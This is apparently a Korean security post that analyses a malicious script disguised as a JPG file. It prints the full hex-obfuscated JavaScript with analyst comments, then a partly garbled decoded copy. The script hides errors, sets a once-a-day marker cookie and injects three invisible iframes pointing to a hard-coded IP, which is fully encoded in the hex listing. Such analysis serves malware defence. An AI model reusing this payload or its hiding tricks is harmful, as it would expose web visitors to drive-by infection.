

Jpg 파일로 위장한 악성 Script !!

js.jpg로 위장한 악성코드 스크립트가 있어서 올려봅니다.

언뜻 보기에는 일반 사진 같습니다.

하지만 그 속에는 무언가 다른 것이 숨어 있지요.....



// Analyst annotation: obfuscated script carried inside a file named js.jpg.
// Every property name and string literal is written as \xNN escapes, so the
// plain tokens "onerror", "document", "cookie" and "iframe" never appear in
// the file as text. The decoded form is given further down the post; the
// comments here describe what each line does once decoded.
// The repeated NjKS1 / gO6 assignments are dead filler: the same string is
// assigned again and again and never read. It only pads the file and breaks
// up the lines that matter.
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
// Decodes to window["onerror"]=function(){return true;} — a handler that
// reports every script error as handled, so a failure in the payload below
// never surfaces as a browser error dialog. A global onerror that just
// returns true is a useful detection signal on its own.
window["\x6f\x6e\x65\x72\x72\x6f\x72"]=function(){return true;}
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
// Decodes to document.cookie.indexOf('grgx7do57632e65')==-1: the body runs
// only when the marker cookie set inside it is absent, i.e. on the first
// visit (per browser) within the cookie's lifetime.
if(window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x67\x72\x67\x78\x37\x64\x6f\x35\x37\x36\x33\x32\x65\x36\x35')==-1){
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 // new window["Date"]() — current time, used to build the cookie expiry.
 var dlENc7=new window["\x44\x61\x74\x65"]();
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 // setTime(getTime()+24*60*60*1000): expiry is exactly one day ahead.
 dlENc7["\x73\x65\x74\x54\x69\x6d\x65"](dlENc7["\x67\x65\x74\x54\x69\x6d\x65"]()+24*60*60*1000);
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 // Decodes to document.cookie='grgx7do57632e65=Yes;path=/;expires='+toGMTString():
 // marks this browser so the hidden frames below are injected at most once a
 // day. The cookie name 'grgx7do57632e65' is an indicator worth searching for.
 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]='\x67\x72\x67\x78\x37\x64\x6f\x35\x37\x36\x33\x32\x65\x36\x35\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d'+dlENc7["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]();
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 // Decodes to document.title=document.title.replace(/\<(\w|\W)*\>/,""):
 // strips the first "<...>" segment from the page title.
 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x74\x69\x74\x6c\x65"]=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x74\x69\x74\x6c\x65"]["\x72\x65\x70\x6c\x61\x63\x65"](/\<(\w|\W)*\>/,"");
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
// "http://" — the URL scheme, kept in a separate variable.
var GPKw13="\x68\x74\x74\x70\x3a\x2f\x2f";
// Always the empty string. It is spliced into "ifr"+s14+"ame" purely so the
// literal token "iframe" never appears contiguously in the file.
var s14="";
 // document.write('<iframe src=http://204.188.[redacted].131/retkc.htm width=0 height=0></iframe>')
 // (third octet omitted here as in the author's decoded listing). A 0x0 frame
 // loaded from a hard-coded IP is the drive-by landing page.
 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](""+"\x3c\x69\x66\x72\x61"+s14+"\x6d\x65 \x73\x72\x63\x3d"+GPKw13+"\x32\x30\x34\x2e\x31\x38\x38\x2e\x32\x34\x33\x2e\x31\x33\x31\x2f\x72\x65\x74\x6b\x63\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72"+s14+"\x61\x6d\x65\x3e");
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 // Same host, second hidden frame: /retkl.htm. Note the split point inside
 // "iframe" differs from the previous line ("<if"+s14+"rame").
 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](""+"\x3c\x69\x66"+s14+"\x72\x61\x6d\x65 \x73\x72\x63\x3d"+GPKw13+"\x32\x30\x34\x2e\x31\x38\x38\x2e\x32\x34\x33\x2e\x31\x33\x31\x2f\x72\x65\x74\x6b\x6c\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66"+s14+"\x72\x61\x6d\x65\x3e");
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 // document.writeln of a third hidden frame, /count.html on the same host;
 // here the scheme is written inline ("http:\/\/") instead of via GPKw13.
 // By its name it looks like a visit counter — inferred, not shown by the code.
 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72"+s14+"\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x32\x30\x34\x2e\x31\x38\x38\x2e\x32\x34\x33\x2e\x31\x33\x31\/\x63\x6f\x75\x6e\x74\x2e\x68\x74\x6d\x6c \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72"+"\x61\x6d\x65\x3e");
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
}
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";

위와 같은 코드가 위장한 파일 속에 들어 있음을 알 수 있습니다 !

\xNN 이스케이프를 다시 문자로 리플레이스 해주면 본 모습을 다음과 같이 볼 수 있습니다 !

// Analyst annotation: the same script with the \xNN escapes replaced by plain
// characters. A few characters were lost in this transcription (noted inline);
// the hex listing above is the authoritative form.
// NjKS1 / gO6 are dead filler — assigned repeatedly, never read.
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
// Global error handler that reports every error as handled: hides any
// failure of the payload from the user.
window["onerror"]=function(){return true;}
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
// Gate: run only when the marker cookie 'grgx7do57632e65' is not present.
if(window["document"]["cookie"]["indexOf"]('grgx7do57632e65')==-1){
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 var dlENc7=new window["Date"]();
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 // Expiry = now + 24 hours.
 dlENc7["setTime"](dlENc7["getTime"]()+24*60*60*1000);
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 // Sets the marker cookie so the frames are injected at most once per day.
 // Transcription note: the hex form encodes "path=/;" — the "/" is missing here.
 window["document"]["cookie"]='grgx7do57632e65=Yes;path=;expires='+dlENc7["toGMTString"]();
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 // Strips the first "<...>" segment from the page title.
 // Transcription note: the regex in the hex form is /\<(\w|\W)*\>/ — the
 // backslashes have become "/" here, which is not valid JavaScript as printed.
 window["document"]["title"]=window["document"]["title"]["replace"](/<(/w|/W)*/>,"");
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
// Transcription note: the hex form decodes to "http://"; the "//" is missing here.
var GPKw13="http:";
// Empty string used only to split the token "iframe" in the hex form.
var s14="";
 // Three hidden (width=0 height=0) frames loaded from a hard-coded IP: the
 // first two (/retkc.htm, /retkl.htm) are the drive-by landing pages; the
 // third (/count.html) looks like a visit counter — inferred from its name only.
 // The author redacted the third octet; the full address is in the hex form.
 // Transcription note: the closing tag in the hex form is "</iframe>" (split
 // as "</ifr"+s14+"ame>"); the two lines below show "<iframe>" instead.
 window["document"]["write"](""+"<iframe src=http://204.188.[생략].131/retkc.htm width=0 height=0><iframe>");
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 window["document"]["write"](""+"<iframe src=http://204.188.[생략].131/retkl.htm width=0 height=0><iframe>");
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 window["document"]["writeln"]("<iframe src=http://204.188.[생략].131/count.html width=0 height=0></ifr"+"ame>");
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
}
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";

나머지 스크립트는 아직 분석 중이므로, 제가 파악한 여기까지만 서술합니다 !!!!!!